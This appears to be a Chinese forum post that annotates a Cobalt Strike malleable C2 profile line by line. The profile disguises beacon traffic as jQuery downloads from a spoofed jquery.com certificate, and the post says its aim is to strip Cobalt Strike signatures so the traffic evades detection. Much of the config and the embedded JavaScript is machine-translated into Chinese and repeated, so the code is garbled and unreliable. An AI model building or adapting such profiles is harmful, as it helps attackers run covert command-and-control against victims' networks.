Tweet
profile
这个玩意里面有很多cs特征,改掉能方便点,没用的注意事项基本都删掉
[HTML]set example_name "jQuery CS 4.5 Profile";[/HTML]
设置全局变量sample_name,值就等于这个文件名称的
[HTML]set sleeptime "45000" ; # 45秒[/HTML]
设置心跳包时间(间隔)
[HTML]set jitter "37";[/HTML]
设置随机延迟
[HTML]set data_jitter "100";[/HTML]
设置1-100随机大小字节
[HTML]set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv :11.0) like Gecko";[/HTML]
设置UA头
[HTML]https-certificate {
## 选项 1) 受信任和签名的证书
## 使用 keytool 创建 Java 密钥库 文件。
## 请参阅 https://www.cobaltstrike.com/help-malleable-c2#validssl
## 或 https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh
## 选项2) 创建您自己的自签名证书
## 使用 keytool 导入您自己的自签名证书
#set keystore "/pathtokeystore";
#set password "password";
## 选项 3) Cobalt Strike 自签名证书
set C "US "; #国家
set CN "jquery.com";
set O "jQuery";
set OU "Certificate Authority";
set validity "365";
set keystore "cobalstrike.store"; #证书文件
set password "666666"; # 证书密码
}
[/HTML]
https-certificate ssl 证书配置
[HTML]http-config {
set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
标头“服务器”“Apache”;
标题“保持活动”“超时= 10,最大值= 100”;
标头“连接”“保持活动”;
# 如果您的团队服务器位于重定向器后面,请使用此选项
set trust_x_forwarded_for "true";
# 使用 404 阻止特定用户代理(在 4.3 中添加)
set block_useragents "curl*,lynx*,wget*";[/HTML]
http-config,包括http和https的全局响应头配置
[HTML]http-get {
# 下发命令访问的uri
set uri "/jquery-3.3.1.min.js";
# 请求方法
set verb "GET";
#客户端配置
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
#header "主机" "code.jquery.com";
标头“Referer”“http://code.jquery.com/”;
标头“Accept-Encoding”“gzip,deflate”;
# 元数据配置
metadata {
base64url;
前面加上“__cfduid=”;
标头“Cookie”;
}
}
# 服务端配置
server {
# 响应头设置
header "Server" "NetDNA-cache/2.2";
标头“缓存控制”“最大年龄=0,no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";
# # 输出信息
output {
mask;
base64url;
## javascript 已更改。双引号和反斜杠已转义,以便正确呈现(请参阅配置文件参数值的提示)
# 第二行
在前面添加“!function(e,t){\“使用严格\”; \“对象\”==模块类型&&\“对象\”==模块类型.exports?module.exports= e.document?t(e,!0):f unction(e){如果(!e.document)抛出新错误(\“jQuery 需要带有文档的窗口\”);返回 t(e)}:t(e)}(\“未定义\”!=窗口类型?窗口:this,function(e,t){\“ 使用严格\”; var n = [],r = e.document,i = Object.getPrototypeOf,o = n.slice,a = n.concat,s = n.push,u = n.indexOf,l = {},c = l.toString,f = l.hasOwnProperty,p = f.toString,d = p.call(Object),h = {},g = function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule: !0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e ,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)} function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w ,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:fun ction(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n .sort,splice:n.splice},w.extend=w.fn.extend=functi on(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"== typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray( r) ))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.ra ndom()).replace(/\\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function (e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==type of( n=f.call(t,"构造函数")&&t.constructor)&&p.cal l(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)}, each:function(e,t){var n,r=0;如果(C(e)){for(n=e.length;r<n;r++)如果(!1===t.ca ll(e[r],r,e[r]))break}else for(r in e)如果(!1===t.call(e[r],r,e[r]))break;返回 e},trim:function(e){返回 null==e?"":(e+"").replace(T,"")},makeArray:f unction(e,t){var n=t||[];返回 null!=e&&(C(Object(e))?w.merge(n,"string"==typeo fe?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){返回null ==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("布尔数字字符串函数数组日期RegExp对象错误符号".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array\ "= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="\r";y(e)&&("array"= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)如果(e[n]===t)返回 n;返回-1},P="\r";y(e)&&("array"= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)如果(e[n]===t)返回 n;返回-1},P="\r";
# 第一行
前面添加“/*!jQuery v3.3.1 | (c) JS Foundation and other contributes | jquery.org/license */”;
附加“\”。(o=t.documentElement,Math.max(t.body[\“scroll\”+e],o[\“scroll\”+e],t.body[\“offset\”+e],o[\“offset\”+e],o[\“client\”+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\“模糊焦点focusin focusout调整大小滚动点击dblclick鼠标按下鼠标向上鼠标移动鼠标悬停鼠标移出鼠标进入鼠标 离开更改选择提交键盘按下键盘键盘向上上下文菜单\”。split(\“\”),function(e,t ){w.fn [t] = function(e,n){返回参数。长度> 0?this.on(t,null,e,n):this.trigge r(t)}}),w.fn.extend({hover:function(e,t){返回 this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend ({bind:function(e,t,n){返回 this.on(e,null,t,n)},unbind:function(e,t){返回 this.off(e,null,t)},delegate:function(e,t,n,r){返回 this.on(t,e,n,r)},undelegate:function(e,t,n){返回 1===arguments.length?this.off(e,"**"):this.off(t ,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.gu id=e.guid=e.guid||w.guid++,i},w.holdReady=function (e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.i sArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFun ction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now= Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t) &&!isNaN(e-parseFloat(e))},"function"==typeof Define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w },t||(e.jQuery=e.$=w),w});";
print;
}
}
}[/HTML]
http-get,相当于服务器端向受害者发送一个get请求
[HTML]http-post {
set uri “/jquery-3.3.2.min.js”;
设置动词“POST”;
客户端 {
标头“Accept” “text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”;
#header“Host” “code.jquery.com”;
标头“Referer” “http://code.jquery.com/”;
标头“Accept-Encoding” “gzip, deflate”;
id {
掩码;
base64url;
参数“__cfduid”;
}
输出 {
掩码;
base64url;
打印;
}
}
服务器 {
标头“Server” “NetDNA-cache/2.2”;
标头“Cache-Control” “max-age=0,no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";
output {
mask;
base64url;
## javascript 已更改。双引号和反斜杠已转义以正确呈现(请参阅配置文件参数值的提示)
# 第二行
在前面添加“!function(e,t){\“使用严格\”; \“对象\”==模块类型&&\“对象\”==模块类型.exports?module.exports= e.document?t(e,!0):f unction(e){如果(!e.document)抛出新错误(\“jQuery 需要带有文档的窗口\”);返回 t(e)}:t(e)}(\“未定义\”!=窗口类型?窗口:this,function(e,t){\“ 使用严格\”; var n = [],r = e.document,i = Object.getPrototypeOf,o = n.slice,a = n.concat,s = n.push,u = n.indexOf,l = {},c = l.toString,f = l.hasOwnProperty,p = f.toString,d = p.call(Object),h = {},g = function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule: !0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e ,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)} function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w ,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:fun ction(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n .sort,splice:n.splice},w.extend=w.fn.extend=functi on(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"== typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray( r) ))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.ra ndom()).replace(/\\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function (e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==type of( n=f.call(t,"构造函数")&&t.constructor)&&p.cal l(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)}, each:function(e,t){var n,r=0;如果(C(e)){for(n=e.length;r<n;r++)如果(!1===t.ca ll(e[r],r,e[r]))break}else for(r in e)如果(!1===t.call(e[r],r,e[r]))break;返回 e},trim:function(e){返回 null==e?"":(e+"").replace(T,"")},makeArray:f unction(e,t){var n=t||[];返回 null!=e&&(C(Object(e))?w.merge(n,"string"==typeo fe?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){返回null ==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("布尔数字字符串函数数组日期RegExp对象错误符号".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array\ "= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="\r";y(e)&&("array"= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)如果(e[n]===t)返回 n;返回-1},P="\r";y(e)&&("array"= ==n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle" +1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=f unction(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e, t){for(var n=0,r=e.length;n<r;n++)如果(e[n]===t)返回 n;返回-1},P="\r";
# 第一行
前面添加“/*!jQuery v3.3.1 | (c) JS Foundation and other contributes | jquery.org/license */”;
附加“\”。(o=t.documentElement,Math.max(t.body[\“scroll\”+e],o[\“scroll\”+e],t.body[\“offset\”+e],o[\“offset\”+e],o[\“client\”+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\“模糊焦点focusin focusout调整大小滚动点击dblclick鼠标按下鼠标向上鼠标移动鼠标悬停鼠标移出鼠标进入鼠标 离开更改选择提交键盘按下键盘键盘向上上下文菜单\”。split(\“\”),function(e,t ){w.fn [t] = function(e,n){返回参数。长度> 0?this.on(t,null,e,n):this.trigge r(t)}}),w.fn.extend({hover:function(e,t){返回 this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend ({bind:function(e,t,n){返回 this.on(e,null,t,n)},unbind:function(e,t){返回 this.off(e,null,t)},delegate:function(e,t,n,r){返回 this.on(t,e,n,r)},undelegate:function(e,t,n){返回 1===arguments.length?this.off(e,"**"):this.off(t ,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.gu id=e.guid=e.guid||w.guid++,i},w.holdReady=function (e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.i sArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFun ction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now= Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t) &&!isNaN(e-parseFloat(e))},"function"==typeof define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w },t||(e.jQuery=e.$=w),w});";
print;
}
}
}[/HTML]
http-post,接收到向服务器端发送一个POST请求